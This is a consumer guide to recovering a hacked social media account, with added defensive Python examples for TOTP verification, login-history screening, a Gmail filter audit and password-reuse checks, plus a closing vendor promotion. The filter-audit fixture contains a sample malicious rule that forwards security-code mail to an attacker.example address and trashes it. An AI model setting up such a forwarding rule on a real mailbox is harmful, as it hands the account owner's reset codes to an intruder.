Security | April 13, 2026 | 8 min read

What to Do If Your Social Media Account Is Hacked


By Sarah Chen

Head of Privacy Research


Realizing someone else has taken control of your social media account is unsettling. Whether it is Instagram, Facebook, X, or another platform, a hacked account puts your personal data, your reputation, and even your contacts at risk. The good news is that most accounts can be recovered if you act quickly and methodically. Here is exactly what to do.

Warning Signs Your Account Has Been Compromised

Sometimes a hack is immediately obvious -- you are locked out entirely. Other times the signs are more subtle. Watch for:

  • Posts, stories, or reels you did not create: Spammy promotions, suspicious links, or offensive content appearing under your name
  • Direct messages you did not send: Hackers often message your contacts with phishing links or requests for money while posing as you
  • Login notifications from unknown locations: Alerts showing sign-ins from cities, countries, or devices you have never used
  • Password or email change confirmations you did not initiate: A clear signal that someone is actively modifying your account
  • Friends telling you something seems off: Contacts may notice suspicious activity before you do
  • Unfamiliar connected apps or devices: New third-party apps granted access or devices listed in your active sessions

Act Within the First Hour

The window between a hack and a full account takeover can be very short. Hackers often change your password, recovery email, and phone number within minutes. The faster you respond, the more likely you are to recover the account without platform intervention. Drop everything and follow the steps below as soon as you notice something wrong.

Step 1: Try to Log In and Change Your Password

If you can still access the account, change your password immediately. Pick a long password or passphrase, at least 16 characters, and use it nowhere else; length and uniqueness protect you far more than forcing a mix of character classes, and a password manager can generate and store it for you. While you are in the settings, also log out of all other sessions: on many platforms a password change does not end sessions the attacker already has open.

If the hacker has already changed your password and you are locked out, use the platform's recovery process:

  • Instagram: Tap "Get help logging in" on the login screen, or visit the Instagram Help Center and select "My account was hacked." Instagram can send a login link to your email or phone, or walk you through a selfie video verification process.
  • Facebook: Go to facebook.com/hacked and follow the guided recovery flow. Facebook will ask you to identify your account and then verify your identity, for example through your recovery email or phone or by uploading a photo ID.
  • X (Twitter): Use the "Forgot password" flow from the login screen. If your email and phone have been changed, submit a support request through X's Help Center with details proving account ownership.

Step 2: Enable Two-Factor Authentication

Once you regain access, enable two-factor authentication (2FA) immediately. This adds a second verification step, typically a code from an authenticator app, every time someone logs in. Use an authenticator app such as Google Authenticator or Authy rather than SMS codes, since text messages can be redirected by a SIM-swapping attack. Where the platform supports it, a hardware security key or passkey is stronger still: it is bound to the real site, so a phishing page cannot capture and relay it the way it can a six-digit code.

If 2FA was already enabled and the hacker still got in, they may have phished a live code from you, obtained the authenticator's secret seed (for example from an exported backup or a malware-infected phone), used a leaked backup code, or stolen a logged-in session cookie from your browser, which skips the login prompt entirely. In that case reset 2FA from scratch so the platform issues a brand-new secret, log out every session, and generate new backup codes; treat the old codes as burned.
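To make the two caveats above concrete, here is how an authenticator-app code (TOTP, RFC 6238) is actually produced and checked. This is an added example, not code from the original article: the code is a pure function of a shared secret and the clock, so anyone who holds the seed produces identical codes, and a code is accepted for a short window, which is why a phished code can be replayed. The test secret is the one published in RFC 6238; `new_secret` stands in for what a platform does when you reset 2FA (assumed generic behaviour, not any specific platform's implementation).

```python
"""How an authenticator-app (TOTP, RFC 6238) code is produced and verified.

Added example, not code from the original article. The secret below is the
RFC 6238 test vector; new_secret() models a "reset 2FA" on the server side.
"""
import base64
import hashlib
import hmac
import secrets
import struct

RFC6238_SECRET = b"12345678901234567890"  # published RFC 6238 test secret
STEP_SECONDS = 30


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter taken from the current 30 s step."""
    return hotp(secret, unix_time // STEP_SECONDS, digits)


def verify(secret: bytes, code: str, unix_time: int, window: int = 1) -> bool:
    """Accept the current step plus `window` steps either side.

    Servers tolerate this skew so slightly-off clocks still work; it is also
    why a code phished from you a few seconds ago still logs the attacker in.
    """
    counter = unix_time // STEP_SECONDS
    return any(
        hmac.compare_digest(hotp(secret, counter + i, len(code)), code)
        for i in range(-window, window + 1)
    )


def new_secret() -> bytes:
    """What "reset 2FA" does server-side: a fresh random 160-bit seed."""
    return secrets.token_bytes(20)


def provisioning_uri(secret: bytes, account: str, issuer: str) -> str:
    """The otpauth:// URI carried by the QR code an authenticator app scans."""
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return f"otpauth://totp/{issuer}:{account}?secret={b32}&issuer={issuer}"


if __name__ == "__main__":
    now = 59  # RFC 6238 test time; the 8-digit code at this instant is 94287082
    print("victim's app :", totp(RFC6238_SECRET, now, 8))
    print("copied seed  :", totp(RFC6238_SECRET, now, 8))  # identical code
    print("fresh seed   :", totp(new_secret(), now, 8))    # different code
    phished = totp(RFC6238_SECRET, now)
    print("phished code still valid 30 s later:", verify(RFC6238_SECRET, phished, now + 30))
```

The practical reading: changing your password does nothing to a copied seed, and only a reset that issues a new secret (a new QR code) locks the attacker out of the second factor.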

Step 3: Verify Your Recovery Email and Phone Number

Hackers often add their own recovery information so they can regain access later, even after you change your password. Go to your account's security settings and check:

  • Recovery email addresses -- remove any you do not recognize
  • Recovery phone numbers -- make sure only your number is listed
  • Trusted contacts or backup methods -- verify each one is legitimate

Step 4: Review Connected Apps and Active Sessions

Check which third-party apps have permission to access your account and revoke access for anything you do not recognize or no longer use. Then review active sessions (logged-in devices) and log out of any unfamiliar ones, or simply log out of every session except the one you are using: a stolen session cookie keeps working until its session is ended, even after a password change. On most platforms you can find these settings under Security or Privacy.

Document Everything

Before you delete the hacker's posts, messages, or profile changes, take screenshots of the unauthorized activity: login history showing unfamiliar IP addresses, locations, and devices, posts you did not make, messages you did not send, and any changes to your profile information. This documentation is valuable if you need to report the incident to the platform, law enforcement, or the FTC.
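Reviewing the login history (Step 4) and deciding which entries to document is easier with a simple screen: flag any login from a device or country you do not use, and any pair of logins too far apart to have been the same person. The following is an added example, not code from the original article; the login records are constructed for illustration, and the "known" device and country sets are assumptions about one particular account owner. Real platforms expose the same fields (time, IP, approximate location, device) under Security > Login activity or in a data export.

```python
"""Screen a login history for unfamiliar devices, locations and impossible travel.

Added example, not code from the original article. SAMPLE_EVENTS is
constructed; KNOWN_DEVICES and KNOWN_COUNTRIES are assumed for this owner.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt


@dataclass(frozen=True)
class LoginEvent:
    when: datetime
    ip: str
    city: str
    country: str
    device: str
    lat: float
    lon: float


# Assumed baseline for this account owner.
KNOWN_DEVICES = {"iPhone / Instagram app", "MacBook / Safari"}
KNOWN_COUNTRIES = {"US"}
MAX_KMH = 900.0  # faster than an airliner between two logins counts as impossible travel


def utc(stamp: str) -> datetime:
    return datetime.fromisoformat(stamp).replace(tzinfo=timezone.utc)


# Constructed sample: two normal logins with a takeover attempt in between.
SAMPLE_EVENTS = [
    LoginEvent(utc("2026-04-10T08:00"), "203.0.113.7", "Seattle", "US", "iPhone / Instagram app", 47.61, -122.33),
    LoginEvent(utc("2026-04-10T09:30"), "198.51.100.22", "Lagos", "NG", "Android / Chrome", 6.52, 3.38),
    LoginEvent(utc("2026-04-11T08:00"), "203.0.113.7", "Seattle", "US", "MacBook / Safari", 47.61, -122.33),
]


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points on the Earth's surface."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlam = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlam / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def review_logins(events, known_devices=KNOWN_DEVICES, known_countries=KNOWN_COUNTRIES):
    """Return [(event, [reasons])] for every login worth screenshotting."""
    findings = []
    ordered = sorted(events, key=lambda e: e.when)
    for i, e in enumerate(ordered):
        reasons = []
        if e.device not in known_devices:
            reasons.append(f"unknown device: {e.device}")
        if e.country not in known_countries:
            reasons.append(f"unknown country: {e.country} ({e.city}, {e.ip})")
        if i > 0:
            prev = ordered[i - 1]
            hours = (e.when - prev.when).total_seconds() / 3600
            km = haversine_km(prev.lat, prev.lon, e.lat, e.lon)
            # Same place in zero time is fine; a long hop in zero or too little time is not.
            if km > 1.0 and (hours <= 0 or km / hours > MAX_KMH):
                reasons.append(f"impossible travel: {km:.0f} km from {prev.city} in {hours:.1f} h")
        if reasons:
            findings.append((e, reasons))
    return findings


if __name__ == "__main__":
    for event, reasons in review_logins(SAMPLE_EVENTS):
        print(event.when.isoformat(), event.ip, "->", "; ".join(reasons))
```

Only the Lagos entry is reported, on all three grounds; the next-day Seattle login is far enough in time that it is not flagged even though it follows the bogus one. Treat a flagged entry as the attacker's session: screenshot it, then end it.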

Step 5: Secure Your Email Accounts

Your social media accounts are only as secure as the email address linked to them. If a hacker controls your email, they can reset your social media passwords at will. Change the password on every email account associated with your social media profiles, enable 2FA on those accounts, and then check the settings an attacker uses to stay in after being locked out: forwarding rules that silently copy your mail elsewhere, filters that delete, archive, or mark as read anything mentioning passwords, security, or verification codes, app passwords or connected apps you do not recognize, and any recovery address or phone number you did not add.
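Forwarding rules and mail-hiding filters are easy to overlook in a web UI, so it helps to audit the exported list. The script below is an added example, not code from the original article. Gmail can export its filters as an Atom XML file (Settings > Filters and Blocked Addresses > Export); the sample feed here is constructed to look like that export, and the only assumption about your own setup is the set of domains you control (`OWN_DOMAINS`). It flags any filter that forwards mail, and any filter that trashes, archives, or marks as read mail whose criteria mention passwords, security, or verification codes.

```python
"""Audit an exported Gmail filter list for forwarding and mail-hiding rules.

Added example, not code from the original article. SAMPLE_EXPORT is a
constructed feed in the shape of Gmail's filter export; OWN_DOMAINS is an
assumption about which addresses the account owner controls.
"""
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Filter criteria, and the actions attackers use to keep you from seeing mail.
CRITERIA = ("from", "to", "subject", "hasTheWord", "doesNotHaveTheWord")
HIDING_ACTIONS = ("shouldTrash", "shouldArchive", "shouldMarkAsRead")
SENSITIVE_TERMS = ("password", "reset", "security", "verif", "login", "sign-in", "code", "instagram", "facebook")
OWN_DOMAINS = {"example.com"}  # assumed: addresses the owner controls

# Constructed sample export: one benign filter, then two typical takeover filters.
SAMPLE_EXPORT = """<feed xmlns='http://www.w3.org/2005/Atom' xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry>
    <category term='filter'></category>
    <apps:property name='from' value='newsletter@shop.example'/>
    <apps:property name='label' value='Shopping'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
  <entry>
    <category term='filter'></category>
    <apps:property name='hasTheWord' value='password OR verification code'/>
    <apps:property name='forwardTo' value='backup.mailbox@attacker.example'/>
    <apps:property name='shouldTrash' value='true'/>
  </entry>
  <entry>
    <category term='filter'></category>
    <apps:property name='from' value='security@mail.instagram.com'/>
    <apps:property name='shouldMarkAsRead' value='true'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
</feed>
"""


def parse_filters(xml_text: str) -> list:
    """Return each filter as a {property name: value} dict."""
    root = ET.fromstring(xml_text)
    return [
        {p.get("name"): p.get("value") for p in entry.iter(APPS + "property")}
        for entry in root.iter(ATOM + "entry")
    ]


def audit_filters(filters, own_domains=OWN_DOMAINS) -> list:
    """Return [(filter, [reasons])] for rules that leak or hide mail."""
    findings = []
    for f in filters:
        reasons = []
        target = f.get("forwardTo")
        if target:
            domain = target.rsplit("@", 1)[-1].lower()
            where = "your own domain" if domain in own_domains else "an external address"
            reasons.append(f"forwards matching mail to {where}: {target}")
        hides = [a for a in HIDING_ACTIONS if f.get(a) == "true"]
        criteria = " ".join(f.get(c, "") for c in CRITERIA).strip().lower()
        if hides and any(term in criteria for term in SENSITIVE_TERMS):
            reasons.append(f"hides security-related mail ({', '.join(hides)}) matching {criteria!r}")
        if reasons:
            findings.append((f, reasons))
    return findings


if __name__ == "__main__":
    for f, reasons in audit_filters(parse_filters(SAMPLE_EXPORT)):
        print(f, "->", "; ".join(reasons))
```

The newsletter filter passes; the other two are exactly the persistence an attacker leaves behind so that password-reset and new-login notices never reach you. Delete any filter you did not create, then check the account-wide forwarding setting separately, since that is not part of the filter export.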

Step 6: Change Reused Passwords Everywhere

If you used the same password on your hacked social media account as on other services, change those passwords immediately. Credential stuffing -- where attackers try stolen username and password combinations across hundreds of sites -- is one of the most common ways a single breach cascades into multiple compromised accounts. A password manager makes it practical to use a unique password for every service.
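The hard part of this step is knowing which accounts shared the password. If you keep credentials in a password manager, its CSV export answers that offline. The script below is an added example, not code from the original article; the CSV is constructed with generic column names (name, url, username, password), and real exports use their own headers (for example Bitwarden's `login_password`), which you pass to `load_entries`. It lists the accounts that must be rotated first because they share the hacked account's password, groups all reuse without printing passwords, and flags anything shorter than 16 characters.

```python
"""Find every account that shares a compromised password, from a password
manager export.

Added example, not code from the original article. SAMPLE_EXPORT is a
constructed CSV with generic column names.
"""
import csv
import hashlib
import io
from collections import defaultdict

SAMPLE_EXPORT = """name,url,username,password
Instagram,https://instagram.com,sarah.c,Summer2024!
Facebook,https://facebook.com,sarah.c@example.com,Summer2024!
Gmail,https://mail.google.com,sarah.c@example.com,Summer2024!
Bank,https://bank.example,sarah,f9Q-vZ2m-tpL8-wXc4-Hn7R
Work VPN,https://vpn.example,sarah.c,correct horse battery staple
"""


def load_entries(csv_text: str, name_col: str = "name", password_col: str = "password") -> list:
    """Return [(account name, password)] from a CSV export; column names vary by manager."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [(row[name_col], row[password_col]) for row in reader]


def blast_radius(entries, compromised_name: str) -> list:
    """Accounts that must be rotated because they share the hacked account's password."""
    compromised_pw = dict(entries)[compromised_name]
    return sorted(name for name, pw in entries if pw == compromised_pw and name != compromised_name)


def reuse_report(entries) -> dict:
    """Group accounts by password without exposing the password itself.

    The key is a truncated SHA-256 so the report can be kept while you
    rotate the affected accounts."""
    groups = defaultdict(list)
    for name, pw in entries:
        groups[hashlib.sha256(pw.encode()).hexdigest()[:12]].append(name)
    return {key: sorted(names) for key, names in groups.items() if len(names) > 1}


def too_short(entries, min_len: int = 16) -> list:
    """Accounts whose password is shorter than the minimum you now want everywhere."""
    return sorted(name for name, pw in entries if len(pw) < min_len)


if __name__ == "__main__":
    entries = load_entries(SAMPLE_EXPORT)
    print("rotate first:", blast_radius(entries, "Instagram"))
    print("all reuse groups:", reuse_report(entries))
    print("under 16 chars:", too_short(entries))
```

Run this locally on the exported file, never in an online tool, and delete the export when you are done: it is the plaintext of every credential you own.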

Step 7: Scan Your Devices for Malware

The hack may have originated from malware on your computer or phone, such as a keylogger capturing your credentials or an infostealer that copies saved browser passwords and session cookies. Run a full antivirus scan on every device you use to access social media. If malware is found, change your passwords again after the scan is complete, so the new credentials are not immediately captured, and log out of all sessions on every account, since stolen cookies keep working until the session ends.

Step 8: Review Your Personal Data

Once the account is secured, assess what the hacker may have accessed:

  • Payment information: If you had a credit card stored for ads or in-app purchases, check for unauthorized charges and consider requesting a new card number from your bank.
  • Private messages: The hacker may have read or copied your DMs. If any messages contained sensitive information like addresses, financial details, or personal photos, take appropriate steps to protect yourself.
  • Contact information: Warn your contacts that your account was compromised and that they should ignore any suspicious messages sent from your profile.

Step 9: Report the Hack

Report the compromise to the platform using its official reporting channels; each major platform has a dedicated process for hacked accounts. You can also report to the Federal Trade Commission at ReportFraud.ftc.gov, or at IdentityTheft.gov if you suspect identity theft, which also produces a recovery plan you can show banks and credit bureaus. If money was stolen, file a report with your local police department and with the FBI's Internet Crime Complaint Center at ic3.gov as well.

Preventing Future Hacks

Once you have recovered, put these safeguards in place to reduce the risk of another compromise:

  • Use unique passwords for every account: This is the single most effective step. One breached password should never unlock multiple accounts.
  • Keep 2FA enabled at all times: Authenticator-app 2FA defeats automated credential stuffing and most bulk phishing; a security key or passkey also defeats a targeted attacker who relays your code in real time.
  • Be skeptical of messages and links: Phishing remains the primary attack vector. Never enter your credentials on a page you reached by clicking a link in a DM, email, or text message.
  • Audit your accounts quarterly: Review connected apps, active sessions, and privacy settings every few months. Platforms change their defaults frequently.
  • Reduce your data exposure: The less personal information available about you online, the harder it is for attackers to guess security questions, craft convincing phishing messages, or impersonate you.

Reduce Your Exposure with PrivacyOn

Social media hacks often start with personal information that attackers find through data brokers -- your email addresses, phone numbers, past addresses, and more. This data fuels phishing campaigns and helps criminals answer security questions or impersonate you convincingly.

PrivacyOn removes your personal information from over 100 data broker sites and provides 24/7 dark web monitoring to alert you when your credentials appear in breaches. By shrinking your digital footprint, you make it significantly harder for attackers to target you in the first place. Combined with the security steps above, PrivacyOn helps you build a layered defense that goes well beyond a strong password.

Sarah Chen, Head of Privacy Research (CIPP/US Certified, IAPP Member, B.S. Computer Science)

CIPP/US-certified privacy researcher with over a decade of experience helping consumers remove their personal information from data brokers.
